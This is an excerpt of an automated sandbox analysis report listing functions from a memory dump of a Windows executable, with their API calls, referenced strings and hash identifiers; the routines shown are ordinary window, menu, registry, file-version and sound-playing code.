Instruction Fuzzy Hash: 6661E175D00319EFCF15DFA8D884AAEBBB5FF48310F20852AE955A7350D770A9418F60

Function 00D8DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00D8DAA1

Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D659
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D66B
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D67D
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D68F
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6A1
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6B3
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6C5
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6D7
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6E9
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D6FB
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D70D
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D71F
Part of subcall function 00D8D63C: _free.LIBCMT ref: 00D8D731

_free.LIBCMT ref: 00D8DA96

Part of subcall function 00D829C8: HeapFree.KERNEL32(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0

_free.LIBCMT ref: 00D8DAB8
_free.LIBCMT ref: 00D8DACD
_free.LIBCMT ref: 00D8DAD8
_free.LIBCMT ref: 00D8DAFA
_free.LIBCMT ref: 00D8DB0D
_free.LIBCMT ref: 00D8DB1B
_free.LIBCMT ref: 00D8DB26
_free.LIBCMT ref: 00D8DB5E
_free.LIBCMT ref: 00D8DB65
_free.LIBCMT ref: 00D8DB82
_free.LIBCMT ref: 00D8DB9A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: bbec238448e6651519c944b9bb80f77e61f59d2ec6f6f07af3351416151c4686
Instruction ID: 4663ce9ab6671a7762158068c22d0712a2c8336ae04780a9d9feb7a52c0ce7aa
Opcode Fuzzy Hash: bbec238448e6651519c944b9bb80f77e61f59d2ec6f6f07af3351416151c4686
Instruction Fuzzy Hash: 67311931644605AFEB25BA39E845B6A77EAFF10320F2A4419E459D71D1DF35AC808B30

Function 00DB365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00DB369C
_wcslen.LIBCMT ref: 00DB36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00DB3797
GetClassNameW.USER32(?,?,00000400), ref: 00DB380C
GetDlgCtrlID.USER32(?), ref: 00DB385D
GetWindowRect.USER32(?,?), ref: 00DB3882
GetParent.USER32(?), ref: 00DB38A0
ScreenToClient.USER32(00000000), ref: 00DB38A7
GetClassNameW.USER32(?,?,00000100), ref: 00DB3921
GetWindowTextW.USER32(?,?,00000400), ref: 00DB395D

Strings

%s%u, xrefs: 00DB3734

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 2df93a874e030c989540c513820fc1dbf198baf80d55bab24c3729647944a14b
Instruction ID: 2610b47ec48a88feef19fcedc728f00ac5a7fd16f4751f2368615ef1818250d7
Opcode Fuzzy Hash: 2df93a874e030c989540c513820fc1dbf198baf80d55bab24c3729647944a14b
Instruction Fuzzy Hash: E891A171204706EFDB19DF24C885BEAB7A8FF44350F048529F99AC6190EB30EA45DBB1

Function 00DB4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00DB4994
GetWindowTextW.USER32(?,?,00000400), ref: 00DB49DA
_wcslen.LIBCMT ref: 00DB49EB
CharUpperBuffW.USER32(?,00000000), ref: 00DB49F7
_wcsstr.LIBVCRUNTIME ref: 00DB4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00DB4A64
GetWindowTextW.USER32(?,?,00000400), ref: 00DB4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00DB4AE6
GetClassNameW.USER32(?,?,00000400), ref: 00DB4B20
GetWindowRect.USER32(?,?), ref: 00DB4B8B

Strings

ThumbnailClass, xrefs: 00DB4A6F, 00DB4AF1

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 5a2c29de732c589f2d23ddc3587ae187275294eda2062fca2994ec07d6f2f467
Instruction ID: f152069514a3bb2cc6f81f89fb982818890377fc762d17c59cc876c3288580d8
Opcode Fuzzy Hash: 5a2c29de732c589f2d23ddc3587ae187275294eda2062fca2994ec07d6f2f467
Instruction Fuzzy Hash: AF919E71104305DBDB04DF14C981BEABBA8EF44714F08846DFE869A196EB30ED45CBB5

Function 00DE8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D69BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D69BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DE8D5A
GetFocus.USER32 ref: 00DE8D6A
GetDlgCtrlID.USER32(00000000), ref: 00DE8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00DE8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00DE8ECF
GetMenuItemCount.USER32(?), ref: 00DE8EEC
GetMenuItemID.USER32(?,00000000), ref: 00DE8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00DE8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00DE8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DE8FA1

Strings

0, xrefs: 00DE8E9F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 669cc4ba3abfc4e1daa3aaeaf5d93216084030fda9ddf9788975f3edaa8e3b61
Instruction ID: 2c20d7ef84129daefc96a961b38bd0c87403f6268326788d588497b0436e05df
Opcode Fuzzy Hash: 669cc4ba3abfc4e1daa3aaeaf5d93216084030fda9ddf9788975f3edaa8e3b61
Instruction Fuzzy Hash: 9581AF715043819FDB10EF16C884AABBBE9FF88714F080959F999D7291DB31D901EBB2

Function 00DBDC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00DBDC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00DBDC46
_wcslen.LIBCMT ref: 00DBDC50
_wcsstr.LIBVCRUNTIME ref: 00DBDCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DBDCBC

Strings

%u.%u.%u.%u, xrefs: 00DBDD9A
StringFileInfo\, xrefs: 00DBDC8F
\VarFileInfo\Translation, xrefs: 00DBDCB4
DefaultLangCodepage, xrefs: 00DBDD1F
04090000, xrefs: 00DBDCF2

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 5a28e4dd0744eb387bc83fba50bf1c8493248689ada091daaf9e73cf71645d29
Instruction ID: 44c06226c12ff6fad6cd180b7563994add1f3fca312c31da582ec3761e099083
Opcode Fuzzy Hash: 5a28e4dd0744eb387bc83fba50bf1c8493248689ada091daaf9e73cf71645d29
Instruction Fuzzy Hash: A541FF32A40300BBDB14BB659C47EFF7BACEF56710F14406AF905A6183FB719A0296B5

Function 00DDCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DDCC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DDCC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DDCD48

Part of subcall function 00DDCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DDCCAA
Part of subcall function 00DDCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DDCCBD
Part of subcall function 00DDCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DDCCCF
Part of subcall function 00DDCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DDCD05
Part of subcall function 00DDCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DDCD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 00DDCCF3

Strings

advapi32.dll, xrefs: 00DDCCB8
RegDeleteKeyExW, xrefs: 00DDCCC9

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 5b9079ea45c43ef4d75b749c59c62734b41ce2e098fb180fc25e98ad0e9501fb
Instruction ID: ed417215a2b9626c425b72efe188acb011271bc9b4ad0dde377535a5ea80ec84
Opcode Fuzzy Hash: 5b9079ea45c43ef4d75b749c59c62734b41ce2e098fb180fc25e98ad0e9501fb
Instruction Fuzzy Hash: EC316F7192122ABBDB209B94DC88EFFBB7CEF45750F041166F905E6340DB349A46DAB0

Function 00DC3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DC3D40
_wcslen.LIBCMT ref: 00DC3D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00DC3D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DC3DBE
RemoveDirectoryW.KERNEL32(?), ref: 00DC3DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00DC3E55
CloseHandle.KERNEL32(00000000), ref: 00DC3E60
CloseHandle.KERNEL32(00000000), ref: 00DC3E6B

Strings

\??\%s, xrefs: 00DC3D5B
\, xrefs: 00DC3D77
:, xrefs: 00DC3D82

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 1519cb859c6a1a8a72a36c3e26fb7124fc95b30e796a29b10385d428f18e79ba
Instruction ID: 922450b68dc2fd51c952919b7845ed551e3a94dc043b37e145bda468626b9717
Opcode Fuzzy Hash: 1519cb859c6a1a8a72a36c3e26fb7124fc95b30e796a29b10385d428f18e79ba
Instruction Fuzzy Hash: 2631A57191024AABDB21EBA0DC89FEF37BCEF89700F5481A9F609D6150E77097458B34

Function 00DBE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00DBE6B4

Part of subcall function 00D6E551: timeGetTime.WINMM(?,?,00DBE6D4), ref: 00D6E555

Sleep.KERNEL32(0000000A), ref: 00DBE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00DBE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00DBE727
SetActiveWindow.USER32 ref: 00DBE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DBE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 00DBE773
Sleep.KERNEL32(000000FA), ref: 00DBE77E
IsWindow.USER32 ref: 00DBE78A
EndDialog.USER32(00000000), ref: 00DBE79B

Strings

BUTTON, xrefs: 00DBE719

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: f9fbd4083d42a814a7271cc55a81be7fedd731cf31a855b5c472fc8507919250
Instruction ID: 48a957551b817ffc44497526e8238b4ac5ff4c2ec64cf9a8a1ae7c747ef77978
Opcode Fuzzy Hash: f9fbd4083d42a814a7271cc55a81be7fedd731cf31a855b5c472fc8507919250
Instruction Fuzzy Hash: CC218771210344FFEB106F22ECC9EA63B69FB55348B142429F516E63B1DB719C0A9A74

Function 00DBE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DBEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DBEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DBEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DBEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DBEAA7

Strings

play PlayMe wait, xrefs: 00DBEA91
open , xrefs: 00DBEA0C
play PlayMe, xrefs: 00DBEAA2
alias PlayMe, xrefs: 00DBEA36
status PlayMe mode, xrefs: 00DBEA58
close PlayMe, xrefs: 00DBEA6E, 00DBEA9B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: b5aef0b9744d8cdddcc4988653b10828d561c8c44a189da14ef559e532a013eb
Instruction ID: 05f004a10b1ea2cc7b0069acf3c6144617da2604885c1b4c29d32583d2eb413d
Opcode Fuzzy Hash: b5aef0b9744d8cdddcc4988653b10828d561c8c44a189da14ef559e532a013eb
Instruction Fuzzy Hash: B7117331A50359BADB20A7A6DC4ADFF6B7CEFD1B40F4414297C11A20D1EE705989C9B0

Function 00DB5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00DB5CE2
GetWindowRect.USER32(00000000,?), ref: 00DB5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00DB5D59
GetDlgItem.USER32(?,00000002), ref: 00DB5D69
GetWindowRect.USER32(00000000,?), ref: 00DB5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00DB5DCF
GetDlgItem.USER32(?,000003E9), ref: 00DB5DDD
GetWindowRect.USER32(00000000,?), ref: 00DB5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00DB5E31
GetDlgItem.USER32(?,000003EA), ref: 00DB5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DB5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00DB5E67

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 8750b95b628985a7d10564a1a1a39dfc0f93b132e7727486e2690663b25477d1
Instruction ID: 97e230e370a8d62748e50d93d2e7f54cffc078fb2c66e71e7cf5d87be0e6d76b
Opcode Fuzzy Hash: 8750b95b628985a7d10564a1a1a39dfc0f93b132e7727486e2690663b25477d1
Instruction Fuzzy Hash: C5511C70A10705AFDF18DF68DD89BAEBBB5EB48300F548229F916E6294D7709E01CB60

Function 00D68BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D68F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D68BE8,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00D68FC5

DestroyWindow.USER32(?), ref: 00D68C81
KillTimer.USER32(00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00D68D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00DA6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00DA69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D68BBA,00000000,?), ref: 00DA69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D68BBA,00000000), ref: 00DA69D4
DeleteObject.GDI32(00000000), ref: 00DA69E6

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 15e6455b51b4eae2f6abd435f842d3838fc4ce5f01bfecdea2c5582ee239a50f
Instruction ID: 0f83f3d7af1a5f5448741cd58435a179dcf9ef8d763d683bc5a4cd0b29713c74
Opcode Fuzzy Hash: 15e6455b51b4eae2f6abd435f842d3838fc4ce5f01bfecdea2c5582ee239a50f
Instruction Fuzzy Hash: 14619C31502700DFCB359F25C998B2677F1FB95312F194658E082AA660CB31E9D6EFB1

Function 00D69838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00D69944: GetWindowLongW.USER32(?,000000EB), ref: 00D69952

GetSysColor.USER32(0000000F), ref: 00D69862

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 99ee7169f8d9739187d22187dfaa4e1399f9121a58c0e3bf52d22db73cdf4d11
Instruction ID: dffacb8fba69a6dcc00b1d8790acefcefc91a95a2c6ea9d03fd79af8e9f5bfe9
Opcode Fuzzy Hash: 99ee7169f8d9739187d22187dfaa4e1399f9121a58c0e3bf52d22db73cdf4d11
Instruction Fuzzy Hash: 37417F31504740AFDB205F389C94BBA7BA9EB46361F18565AF9A28B2E1D731DC42DB30

Function 00DB96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00D9F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00DB9717
LoadStringW.USER32(00000000,?,00D9F7F8,00000001), ref: 00DB9720

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00D9F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00DB9742
LoadStringW.USER32(00000000,?,00D9F7F8,00000001), ref: 00DB9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00DB9866

Strings

^ ERROR, xrefs: 00DB97FB
Line %d (File "%s"):, xrefs: 00DB978F
Error: , xrefs: 00DB981D
%s (%d) : ==> %s: %s %s, xrefs: 00DB984A
Line %d:, xrefs: 00DB97A0

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: bfb7d6d5445f2e0509f5a59fd8160470c727872ed7d30c5804ffd593b74ab9ab
Instruction ID: fc5e47d36d7af93925a6e88c6d834e2518c1a7889e551fc8f8b7d0ac334b1659
Opcode Fuzzy Hash: bfb7d6d5445f2e0509f5a59fd8160470c727872ed7d30c5804ffd593b74ab9ab
Instruction Fuzzy Hash: 78414A72800219AADF04FBE4DD96DEEB779EF14341F500065FA0672092EA356F49CB71

